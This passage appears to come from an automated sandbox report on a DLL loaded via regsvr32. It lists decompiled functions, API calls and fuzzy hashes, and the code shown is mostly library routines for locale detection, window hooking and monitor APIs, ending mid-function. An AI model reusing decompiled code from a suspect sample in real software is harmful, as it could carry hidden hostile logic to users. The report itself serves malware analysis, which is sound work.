                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3519838083-0
                                                                                                            • Opcode ID: d40d6d6e6cef6803208f6e3609c2f1027a444feec77636e89629d5b53b439ef5
                                                                                                            • Instruction ID: 1e1e474db0047197a83ae3098e3256374823658fb0d5be61515164714213afbe
                                                                                                            • Opcode Fuzzy Hash: d40d6d6e6cef6803208f6e3609c2f1027a444feec77636e89629d5b53b439ef5
                                                                                                            • Instruction Fuzzy Hash: 52E19C74600209EFDF25CF58EC81AAE7BA9EF04750FA1C515F819EB292C735EA10DB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001A444 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001A444(void* __ebx, int _a4) {
				intOrPtr _v8;
				char _v10;
				char _v16;
				void* __ebp;
				intOrPtr _t7;
				signed int _t9;
				signed int _t11;
				void* _t14;
				void* _t17;

				_t7 =  *0x1004c470; // 0xf3933a06
				_v8 = _t7;
				_v10 = 0;
				_t9 = GetLocaleInfoA(_a4, 0x1004,  &_v16, 6);
				if(_t9 != 0) {
					_t11 = E10012749(__ebx, _t14, _t17,  &_v16);
				} else {
					_t11 = _t9 | 0xffffffff;
				}
				return E100117AE(_t11, _v8);
			}












                                                                                                            0x1001a44a
                                                                                                            0x1001a451
                                                                                                            0x1001a460
                                                                                                            0x1001a464
                                                                                                            0x1001a46c
                                                                                                            0x1001a477
                                                                                                            0x1001a46e
                                                                                                            0x1001a46e
                                                                                                            0x1001a46e
                                                                                                            0x1001a486

                                                                                                            APIs
                                                                                                            • GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 1001A464
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: 05a0c33dc4fe3510d994e67f2a9bcf377461d58a3556d082f56ba058f11004d6
                                                                                                            • Instruction ID: 3c73900817429885cf4f72f3856ece86c9a81f663f4ecb35863165dbab89a4dc
                                                                                                            • Opcode Fuzzy Hash: 05a0c33dc4fe3510d994e67f2a9bcf377461d58a3556d082f56ba058f11004d6
                                                                                                            • Instruction Fuzzy Hash: 66E09235A04248ABDB00DBF4D946E8D77F8AB45314F004155E550DB1D0DBB1E6848754
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10034959 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 167registrylibraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E10034959(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				void* _v28;
				void* _v32;
				int _v36;
				int _v40;
				signed short _v44;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				intOrPtr _t42;
				struct HINSTANCE__* _t43;
				_Unknown_base(*)()* _t44;
				struct HINSTANCE__* _t46;
				void* _t47;
				signed int _t50;
				signed short _t65;
				signed int _t66;
				int _t70;
				signed short _t71;
				signed int _t72;
				signed short _t78;
				signed int _t79;
				char* _t85;
				int _t87;
				signed int _t95;
				signed int _t99;
				int _t100;
				int _t101;
				void* _t105;
				void* _t109;

				_t42 =  *0x1004c470; // 0xf3933a06
				_t85 = 0;
				_v8 = _t42;
				_v28 = 0;
				_t43 = GetModuleHandleA("kernel32.dll");
				_v36 = _t43;
				_t44 = GetProcAddress(_t43, "GetUserDefaultUILanguage");
				if(_t44 == 0) {
					if(GetVersion() >= 0) {
						_t46 = GetModuleHandleA("ntdll.dll");
						if(_t46 == 0) {
							L13:
							 *((intOrPtr*)(_t109 + 0xffffffffffffffc4)) = 0x800;
							_t105 = 1;
							_t99 = 0;
							if(1 <= _t85) {
								L16:
								_t47 = 0;
								L17:
								return E100117AE(_t47, _v8);
							} else {
								goto L14;
							}
							while(1) {
								L14:
								_t47 = E100348C4(_t85, _t88, _t105, _a4,  *((intOrPtr*)(_t109 + _t99 * 4 - 0x3c)));
								_pop(_t88);
								if(_t47 != _t85) {
									goto L17;
								}
								_t99 =  &(1[_t99]);
								if(_t99 < _t105) {
									continue;
								}
								goto L16;
							}
							goto L17;
						}
						_t88 =  &_v28;
						_v28 = 0;
						EnumResourceLanguagesA(_t46, 0x10, 1, 0x10034943,  &_v28);
						if(_v28 == 0) {
							goto L13;
						}
						_t50 = _v28 & 0x0000ffff;
						_t88 = _t50 & 0x000003ff;
						_t100 = _t50 & 0x3ff;
						_v64 = ConvertDefaultLocale(_t50 & 0x0000fc00 | _t100);
						_v60 = ConvertDefaultLocale(_t100);
						_push(2);
						L12:
						_pop(0);
						goto L13;
					}
					_v32 = 0;
					if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v32) == 0) {
						_v36 = 0x10;
						if(RegQueryValueExA(_v32, 0, 0,  &_v40,  &_v24,  &_v36) == 0 && _v40 == 1 && E10011D9B(0, GetModuleHandleA, 0,  &_v24, "%x",  &_v44) == 1) {
							_t65 = _v44;
							_v28 = _t65;
							_t66 = _t65 & 0x0000ffff;
							_t88 = _t66 & 0x000003ff;
							_t101 = _t66 & 0x3ff;
							_v64 = ConvertDefaultLocale(_t66 & 0x0000fc00 | _t101);
							_t70 = ConvertDefaultLocale(_t101);
							_push(2);
							_v60 = _t70;
							_pop(0);
						}
						RegCloseKey(_v32);
					}
					goto L13;
				}
				_t71 =  *_t44();
				_v28 = _t71;
				_t72 = _t71 & 0x0000ffff;
				_t95 = _t72 & 0x3ff;
				_v32 = _t95;
				_v64 = ConvertDefaultLocale(_t72 & 0x0000fc00 | _t95);
				_v60 = ConvertDefaultLocale(_v32);
				_t78 =  *(GetProcAddress(_v36, "GetSystemDefaultUILanguage"))();
				_v28 = _t78;
				_t79 = _t78 & 0x0000ffff;
				_t88 = _t79 & 0x000003ff;
				_t87 = _t79 & 0x3ff;
				_v56 = ConvertDefaultLocale(_t79 & 0x0000fc00 | _t87);
				_v52 = ConvertDefaultLocale(_t87);
				_push(4);
				_t85 = 0;
				goto L12;
			}



































                                                                                                            0x1003495f
                                                                                                            0x1003496d
                                                                                                            0x10034974
                                                                                                            0x10034977
                                                                                                            0x1003497c
                                                                                                            0x10034984
                                                                                                            0x10034987
                                                                                                            0x1003498f
                                                                                                            0x10034a03
                                                                                                            0x10034ab0
                                                                                                            0x10034ab4
                                                                                                            0x10034afe
                                                                                                            0x10034afe
                                                                                                            0x10034b06
                                                                                                            0x10034b07
                                                                                                            0x10034b0b
                                                                                                            0x10034b24
                                                                                                            0x10034b24
                                                                                                            0x10034b26
                                                                                                            0x10034b32
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034b0d
                                                                                                            0x10034b0d
                                                                                                            0x10034b14
                                                                                                            0x10034b1c
                                                                                                            0x10034b1d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034b1f
                                                                                                            0x10034b22
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034b22
                                                                                                            0x00000000
                                                                                                            0x10034b0d
                                                                                                            0x10034ab6
                                                                                                            0x10034ac4
                                                                                                            0x10034ac7
                                                                                                            0x10034ad1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034ad3
                                                                                                            0x10034adf
                                                                                                            0x10034ae5
                                                                                                            0x10034af3
                                                                                                            0x10034af8
                                                                                                            0x10034afb
                                                                                                            0x10034afd
                                                                                                            0x10034afd
                                                                                                            0x00000000
                                                                                                            0x10034afd
                                                                                                            0x10034a1d
                                                                                                            0x10034a28
                                                                                                            0x10034a3f
                                                                                                            0x10034a4e
                                                                                                            0x10034a70
                                                                                                            0x10034a79
                                                                                                            0x10034a7c
                                                                                                            0x10034a81
                                                                                                            0x10034a87
                                                                                                            0x10034a95
                                                                                                            0x10034a98
                                                                                                            0x10034a9a
                                                                                                            0x10034a9c
                                                                                                            0x10034a9f
                                                                                                            0x10034a9f
                                                                                                            0x10034aa3
                                                                                                            0x10034aa3
                                                                                                            0x00000000
                                                                                                            0x10034a28
                                                                                                            0x10034991
                                                                                                            0x100349a3
                                                                                                            0x100349a6
                                                                                                            0x100349ad
                                                                                                            0x100349b5
                                                                                                            0x100349bd
                                                                                                            0x100349ca
                                                                                                            0x100349d3
                                                                                                            0x100349d5
                                                                                                            0x100349d8
                                                                                                            0x100349dd
                                                                                                            0x100349df
                                                                                                            0x100349ea
                                                                                                            0x100349ef
                                                                                                            0x100349f2
                                                                                                            0x100349f4
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                                                            • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                                                            • ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                                                            • GetVersion.KERNEL32 ref: 100349FB
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10034A20
                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10034A46
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10034A92
                                                                                                            • ConvertDefaultLocale.KERNEL32(76EC4DE0), ref: 10034A98
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10034AA3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                            • API String ID: 780041395-483790700
                                                                                                            • Opcode ID: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                                                            • Instruction ID: 7cfe531e2014ce0a7197dcc2f573d90a24e44201c953dd79459b2257b218328e
                                                                                                            • Opcode Fuzzy Hash: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                                                            • Instruction Fuzzy Hash: 00515F75D0022DAFDB12DFE6DC85AEFBBF8EB48355F11442AE501EB140DB7899409BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100235CF Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 167stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E100235CF(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
				intOrPtr _v8;
				char _v16;
				char _v17;
				char _v272;
				struct _WNDCLASSEXA _v320;
				void* __ebp;
				intOrPtr _t52;
				signed int _t56;
				char _t58;
				long _t60;
				int _t71;
				long _t81;
				CHAR* _t83;
				void* _t90;
				void* _t99;
				long* _t102;
				signed int _t104;
				long _t105;
				CHAR* _t107;
				int _t108;

				_t52 =  *0x1004c470; // 0xf3933a06
				_push(0x100347fd);
				_v8 = _t52;
				_t90 = E10037855(0x1004efe8);
				if(_a4 == 3) {
					_t104 =  *(_t90 + 0x14);
					_push(__edi);
					_t99 =  *_a12;
					_t56 =  *(E100373B5() + 0x14) & 0x000000ff;
					_a4 = _t56;
					if(_t104 != 0 || ( *(_t99 + 0x23) & 0x00000040) == 0 && _t56 == 0) {
						if( *0x1004f354 == 0) {
							L10:
							if(_t104 == 0) {
								if( *0x1004ef68 != 0) {
									L16:
									if(GetClassLongA(_a8, 0xffffffe0) !=  *0x1004ef68) {
										L20:
										_t58 = GetWindowLongA(_a8, 0xfffffffc);
										_v16 = _t58;
										if(_t58 != 0) {
											_t107 = "AfxOldWndProc423";
											if(GetPropA(_a8, _t107) == 0) {
												SetPropA(_a8, _t107, _v16);
												if(GetPropA(_a8, _t107) == _v16) {
													GlobalAddAtomA(_t107);
													SetWindowLongA(_a8, 0xfffffffc, 0x10023477);
												}
											}
										}
										goto L24;
									}
									goto L24;
								}
								_t108 = 0x30;
								E10011C50( &_v320, 0, _t108);
								_v320.cbSize = _t108;
								_t71 = GetClassInfoExA(0, "#32768",  &_v320);
								 *0x1004ef68 = _t71;
								if(_t71 == 0) {
									if(GetClassNameA(_a8,  &_v272, 0x100) == 0) {
										goto L20;
									}
									_v17 = 0;
									if(E10011CB0(_t90, _t99,  &_v272, "#32768") == 0) {
										goto L24;
									}
									goto L20;
								}
								goto L16;
							}
							E1002212F(_t104, _a8);
							 *((intOrPtr*)( *_t104 + 0x50))();
							_t102 =  *((intOrPtr*)( *_t104 + 0xf0))();
							_t81 = SetWindowLongA(_a8, 0xfffffffc, E1002292C);
							if(_t81 != E1002292C) {
								 *_t102 = _t81;
							}
							 *(_t90 + 0x14) =  *(_t90 + 0x14) & 0x00000000;
							goto L24;
						}
						if((GetClassLongA(_a8, 0xffffffe6) & 0x00010000) != 0) {
							goto L24;
						}
						_t83 =  *(_t99 + 0x28);
						if(_t83 <= 0xffff) {
							_v16 = 0;
							GlobalGetAtomNameA(0,  &_v16, 5);
							_t83 =  &_v16;
						}
						if(lstrcmpiA(_t83, "ime") == 0) {
							goto L24;
						}
						goto L10;
					} else {
						L24:
						_t105 = CallNextHookEx( *(_t90 + 0x28), 3, _a8, _a12);
						if(_a4 != 0) {
							UnhookWindowsHookEx( *(_t90 + 0x28));
							 *(_t90 + 0x28) =  *(_t90 + 0x28) & 0x00000000;
						}
						_t60 = _t105;
						goto L27;
					}
				} else {
					_t60 = CallNextHookEx( *(_t90 + 0x28), _a4, _a8, _a12);
					L27:
					return E100117AE(_t60, _v8);
				}
			}























                                                                                                            0x100235d8
                                                                                                            0x100235de
                                                                                                            0x100235e8
                                                                                                            0x100235f4
                                                                                                            0x100235f6
                                                                                                            0x10023613
                                                                                                            0x10023616
                                                                                                            0x10023617
                                                                                                            0x10023620
                                                                                                            0x10023624
                                                                                                            0x10023627
                                                                                                            0x10023642
                                                                                                            0x10023692
                                                                                                            0x10023694
                                                                                                            0x100236db
                                                                                                            0x10023718
                                                                                                            0x1002372a
                                                                                                            0x10023761
                                                                                                            0x10023766
                                                                                                            0x1002376e
                                                                                                            0x10023771
                                                                                                            0x10023779
                                                                                                            0x10023786
                                                                                                            0x1002378f
                                                                                                            0x1002379e
                                                                                                            0x100237a1
                                                                                                            0x100237b1
                                                                                                            0x100237b1
                                                                                                            0x1002379e
                                                                                                            0x10023786
                                                                                                            0x00000000
                                                                                                            0x10023771
                                                                                                            0x00000000
                                                                                                            0x1002372c
                                                                                                            0x100236df
                                                                                                            0x100236ea
                                                                                                            0x100236f8
                                                                                                            0x10023707
                                                                                                            0x10023710
                                                                                                            0x10023716
                                                                                                            0x10023748
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023752
                                                                                                            0x1002375f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002375f
                                                                                                            0x00000000
                                                                                                            0x10023716
                                                                                                            0x1002369b
                                                                                                            0x100236a4
                                                                                                            0x100236bc
                                                                                                            0x100236be
                                                                                                            0x100236c6
                                                                                                            0x100236c8
                                                                                                            0x100236c8
                                                                                                            0x100236ca
                                                                                                            0x00000000
                                                                                                            0x100236ca
                                                                                                            0x10023654
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002365a
                                                                                                            0x10023662
                                                                                                            0x10023670
                                                                                                            0x10023675
                                                                                                            0x1002367b
                                                                                                            0x1002367b
                                                                                                            0x1002368c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100237b7
                                                                                                            0x100237b7
                                                                                                            0x100237cc
                                                                                                            0x100237ce
                                                                                                            0x100237d3
                                                                                                            0x100237d9
                                                                                                            0x100237d9
                                                                                                            0x100237de
                                                                                                            0x00000000
                                                                                                            0x100237e0
                                                                                                            0x100235f8
                                                                                                            0x10023604
                                                                                                            0x100237e1
                                                                                                            0x100237eb
                                                                                                            0x100237eb

                                                                                                            APIs
                                                                                                              • Part of subcall function 10037855: __EH_prolog.LIBCMT ref: 1003785A
                                                                                                            • CallNextHookEx.USER32 ref: 10023604
                                                                                                            • GetClassLongA.USER32 ref: 10023649
                                                                                                            • GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 10023675
                                                                                                            • lstrcmpiA.KERNEL32(?,ime,?,?,100347FD), ref: 10023684
                                                                                                            • SetWindowLongA.USER32 ref: 100236BE
                                                                                                            • CallNextHookEx.USER32 ref: 100237C2
                                                                                                            • UnhookWindowsHookEx.USER32(?), ref: 100237D3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                                                                                            • String ID: #32768$AfxOldWndProc423$ime
                                                                                                            • API String ID: 3204395069-4034971020
                                                                                                            • Opcode ID: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                                                            • Instruction ID: 9db2fd6ca1a0fe5cf1724ce820e3dc2bd2b139ec8c0118dd51308d1b35c9be8a
                                                                                                            • Opcode Fuzzy Hash: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                                                            • Instruction Fuzzy Hash: 1051AB75504269BFDF12DF61EC88FAA7BB9EF053A0F618164F814EA1A1C730DA44CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000799F Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E1000799F() {
				void* __edi;
				intOrPtr _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				void* _t17;
				struct HINSTANCE__* _t18;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x1004ee14; // 0x0
				if(_t23 == 0) {
					_push(_t17);
					 *0x1004ee18 = E10007952(_t17);
					_t18 = GetModuleHandleA("USER32");
					if(_t18 == 0) {
						L11:
						 *0x1004edf8 = 0;
						 *0x1004edfc = 0;
						 *0x1004ee00 = 0;
						 *0x1004ee04 = 0;
						 *0x1004ee08 = 0;
						 *0x1004ee0c = 0;
						 *0x1004ee10 = 0;
						 *0x1004ee14 = 1;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						 *0x1004edf8 = _t6;
						if(_t6 == 0) {
							goto L11;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							 *0x1004edfc = _t7;
							if(_t7 == 0) {
								goto L11;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								 *0x1004ee00 = _t8;
								if(_t8 == 0) {
									goto L11;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									 *0x1004ee04 = _t9;
									if(_t9 == 0) {
										goto L11;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										 *0x1004ee0c = _t10;
										if(_t10 == 0) {
											goto L11;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											 *0x1004ee08 = _t11;
											if(_t11 == 0) {
												goto L11;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												 *0x1004ee10 = _t12;
												if(_t12 == 0) {
													goto L11;
												} else {
													_t5 = 1;
													 *0x1004ee14 = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					return _t5;
				} else {
					_t24 =  *0x1004ee08; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}
















                                                                                                            0x100079a2
                                                                                                            0x100079a8
                                                                                                            0x100079b8
                                                                                                            0x100079c3
                                                                                                            0x100079ce
                                                                                                            0x100079d2
                                                                                                            0x10007a5f
                                                                                                            0x10007a5f
                                                                                                            0x10007a65
                                                                                                            0x10007a6b
                                                                                                            0x10007a71
                                                                                                            0x10007a77
                                                                                                            0x10007a7d
                                                                                                            0x10007a83
                                                                                                            0x10007a89
                                                                                                            0x10007a93
                                                                                                            0x100079d8
                                                                                                            0x100079e4
                                                                                                            0x100079e8
                                                                                                            0x100079ed
                                                                                                            0x00000000
                                                                                                            0x100079ef
                                                                                                            0x100079f5
                                                                                                            0x100079f9
                                                                                                            0x100079fe
                                                                                                            0x00000000
                                                                                                            0x10007a00
                                                                                                            0x10007a06
                                                                                                            0x10007a0a
                                                                                                            0x10007a0f
                                                                                                            0x00000000
                                                                                                            0x10007a11
                                                                                                            0x10007a17
                                                                                                            0x10007a1b
                                                                                                            0x10007a20
                                                                                                            0x00000000
                                                                                                            0x10007a22
                                                                                                            0x10007a28
                                                                                                            0x10007a2c
                                                                                                            0x10007a31
                                                                                                            0x00000000
                                                                                                            0x10007a33
                                                                                                            0x10007a39
                                                                                                            0x10007a3d
                                                                                                            0x10007a42
                                                                                                            0x00000000
                                                                                                            0x10007a44
                                                                                                            0x10007a4a
                                                                                                            0x10007a4e
                                                                                                            0x10007a53
                                                                                                            0x00000000
                                                                                                            0x10007a55
                                                                                                            0x10007a57
                                                                                                            0x10007a58
                                                                                                            0x10007a58
                                                                                                            0x10007a53
                                                                                                            0x10007a42
                                                                                                            0x10007a31
                                                                                                            0x10007a20
                                                                                                            0x10007a0f
                                                                                                            0x100079fe
                                                                                                            0x100079ed
                                                                                                            0x10007a98
                                                                                                            0x100079aa
                                                                                                            0x100079ac
                                                                                                            0x100079b6
                                                                                                            0x100079b6

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(USER32,?,?,?,10007AF0), ref: 100079C8
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 100079E4
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 100079F5
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10007A06
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10007A17
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10007A28
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10007A39
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10007A4A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                            • API String ID: 667068680-68207542
                                                                                                            • Opcode ID: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                                                            • Instruction ID: ffa68e8141f0c788966a5bf5f1ab221f1da63df34d474a4f7eb5d2f911dd9ebc
                                                                                                            • Opcode Fuzzy Hash: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                                                            • Instruction Fuzzy Hash: 05214F71E055B19EF702EF678EC482EBAE5F38B381351483FD109D6125C7B44D518B9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10024FBB Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 273stringwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E10024FBB(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v32;
				char _v268;
				char _v292;
				char _v296;
				signed int _v300;
				CHAR* _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				void* __ebp;
				signed int _t102;
				intOrPtr _t106;
				signed int _t108;
				signed int _t110;
				int* _t118;
				signed int _t125;
				signed int _t128;
				signed int _t132;
				void* _t136;
				intOrPtr* _t138;
				void* _t170;
				intOrPtr* _t171;
				void* _t173;
				int _t175;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t180;
				intOrPtr* _t181;
				signed int _t182;
				intOrPtr _t183;
				signed char _t196;
				signed char _t197;
				signed int _t217;
				intOrPtr* _t219;
				intOrPtr* _t220;
				void* _t223;
				intOrPtr* _t224;
				signed int _t226;
				void* _t228;
				void* _t229;
				void* _t230;

				_t223 = __esi;
				_t181 = __ecx;
				_t170 = __ebx;
				_t102 =  *0x1004c470; // 0xf3933a06
				_push(__esi);
				_push(__edi);
				_v8 = _t102;
				_t219 = __ecx;
				if(_a4 == 0 || lstrlenA(_a4) >= 0x104) {
					L10:
					_push(0);
					_push(0xffffffff);
					_push(3);
					E10027180(_t181);
					asm("int3");
					E10011BF0(0x1003ab29, _t228);
					_t230 = _t229 - 0x12c;
					_t106 =  *0x1004c470; // 0xf3933a06
					_push(_t170);
					_push(_t223);
					_t224 = _a4;
					_push(_t219);
					_t220 = _t181;
					_t182 =  *(_t224 + 0xc);
					_v20 = _t106;
					_t171 = _t220 + 0x1c;
					_t108 =  *( *_t171 - 0xc);
					__eflags = _t108;
					if(_t108 == 0) {
						__eflags = _t182;
						if(_t182 != 0) {
							E10026397(_t182,  *(_t224 + 4), _t171, _t108);
						}
					}
					_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t220 + 8))));
					_t110 = 0;
